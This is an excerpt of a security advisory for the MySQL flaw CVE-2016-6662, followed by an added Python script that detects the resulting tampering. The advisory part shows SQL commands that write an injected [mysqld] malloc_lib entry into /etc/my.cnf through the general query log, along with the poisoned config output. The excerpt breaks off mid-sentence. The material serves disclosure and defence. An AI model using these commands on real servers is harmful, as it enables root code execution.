MySQL Remote Root Code Execution 0day Exploit (CVE-2016-6662)

– Discovered by: Dawid Golunski
– dawid (at)

– CVE-2016-6662
– Release date: 12.09.2016
– Severity: Critical


mysql> set global general_log_file = '/etc/my.cnf';
mysql> set global general_log = on;
mysql> select '
'> ; injected config entry
'> [mysqld]
'> malloc_lib=/tmp/
'> [separator]
'> ';
1 row in set (0.00 sec)
mysql> set global general_log = off;

The resulting config would then have the following part appended:

root@debian:~/# cat /etc/my.cnf


key_buffer = 16M
max_allowed_packet = 16M

/usr/sbin/mysqld, Version: 5.5.50-0+deb8u1 ((Debian)). started with:
Tcp port: 3306 Unix socket: /var/run/mysqld/mysqld.sock
Time Id Command Argument
160728 17:25:14 40 Query select '

; injected config entry



160728 17:25:15 40 Query set global general_log = off

This config contains some redundant information that would normally cause MySQL
to fail to start up during a restart due to parsing issues.

However, the important part is that the config now contains the section:


mysqld_safe will read the shared library path correctly and add it to
the LD_PRELOAD environment variable before
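
A defender-side check for the state described above, as an added example that is not part of the original advisory: it scans option-file text for lines written by the general query log and for a malloc_lib entry in a [mysqld] or [mysqld_safe] section. The function name, the finding labels and the sample (with a placeholder library path) are constructed for illustration.

```python
import re

# Lines the general query log writes (header and per-query records), as shown
# in the my.cnf listing above; none of them belongs in an option file.
LOG_RESIDUE = [
    re.compile(r"started with:\s*$"),
    re.compile(r"^Tcp port:.*Unix socket:"),
    re.compile(r"^Time\s+Id\s+Command\s+Argument"),
    re.compile(r"^(\d{6}\s+\d{1,2}:\d{2}:\d{2}\s+)?\d+\s+(Query|Connect|Quit)\b"),
]
SECTION = re.compile(r"^\[([^\]]+)\]\s*$")
# MySQL option files treat '-' and '_' in option names as equivalent.
PRELOAD = re.compile(r"^malloc[-_]lib\s*=\s*(.*)$", re.IGNORECASE)

def audit_mycnf(text):
    """Return (line_no, kind, detail) findings for one option file's text."""
    findings, section = [], None
    for no, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line[0] in "#;":
            continue  # blank line or option-file comment
        m = SECTION.match(line)
        if m:
            section = m.group(1).lower()
            continue
        m = PRELOAD.match(line)
        if m and section in ("mysqld", "mysqld_safe"):
            findings.append((no, "preload", f"[{section}] malloc_lib={m.group(1)}"))
        elif any(p.search(line) for p in LOG_RESIDUE):
            findings.append((no, "log-residue", line))
    return findings

# Constructed sample modelled on the listing above; the library path is a placeholder.
SAMPLE = """\
[mysqld]
key_buffer = 16M
/usr/sbin/mysqld, Version: 5.5.50-0+deb8u1 ((Debian)). started with:
Tcp port: 3306 Unix socket: /var/run/mysqld/mysqld.sock
Time Id Command Argument
160728 17:25:14 40 Query select '
; injected config entry
[mysqld]
malloc_lib=/tmp/PLACEHOLDER.so
[separator]
160728 17:25:15 40 Query set global general_log = off
"""

if __name__ == "__main__":
    print(*audit_mycnf(SAMPLE), sep="\n")
```

A malloc_lib entry can be legitimate, so a "preload" finding is a prompt to verify the library path and who wrote the file; a "log-residue" finding means log output was written into the option file.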
